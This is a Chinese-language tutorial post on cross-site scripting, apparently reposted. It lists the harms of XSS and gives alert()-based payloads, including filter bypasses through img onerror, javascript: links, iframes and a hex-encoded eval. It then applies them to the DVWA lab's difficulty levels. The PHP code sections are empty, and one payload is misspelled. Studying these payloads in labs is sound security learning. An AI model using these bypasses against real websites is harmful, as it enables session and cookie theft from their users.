xss總結漏洞篇


Xss漏洞

Xss漏洞出現在1996年。Xss漏洞又名跨站腳本漏洞

 

Xss可能造成的危害

  1. 網站彈框(刷流量)
  2. 網站掛馬
  3. 會話劫持
  4. Cookie被盜取
  5. 用戶提權
  6. 賬號被盜
  7. 盡量DDOS
  8. 蠕蟲攻擊

 

 

Xss分類

1.儲存型xss

2.反彈型xss

 

攻擊

注意:當xss攻擊執行不成功的時候,得想辦法判斷他為什么不成功

是被過濾掉了呢,還是沒有閉合對應的標簽。

 

<script>alert(‘xss’)</script>

0×04 過濾的解決辦法

假如說網站禁止過濾了script 這時該怎么辦呢,記住一句話,這是我總結出來的“xss就是在頁面執行你想要的js”不用管那么多,只要能運行我們的js就OK,比如用img標簽或者a標簽。我們可以這樣寫

<img scr=1 onerror=alert('xss')>當找不到圖片名為1的文件時,執行alert('xss')<a href=javascrip:alert('xss')>s</a> 點擊s時運行alert('xss')<iframe src=javascript:alert('xss');height=0 width=0 /><iframe>利用iframe的scr來彈窗<img src="1" onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img>過濾了alert來執行彈窗

常用的攻擊標簽:img、iframescript,div,style,input,a,math,title等等

Xss過濾表:http://www.freebuf.com/articles/web/153055.html

Xss payload 大全:https://www.jianshu.com/p/3f16269c83db

新型的xss payload在推特關注:xss hack

Xss平台:

DVWA做個例子,低級->不可能

 

級別:低級:

描述:無任何過濾

Payload:<script>alert(‘xss’)</script>

 

 

Php代碼:

 

 

 

 

級別:中級

描述:把script標簽過濾了

Payload:<img src=1 onerror=alert(/xss/)>

 

Php代碼:

 

 

 

級別:高級

描述:用正則過濾掉scrip

Payload:<img src=1 onerror=alert(/xss/)> 一樣

 

 

Php代碼:

 

 

 

 

不可能級別,把用戶輸入的實體化了,所以沒有xss漏洞。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM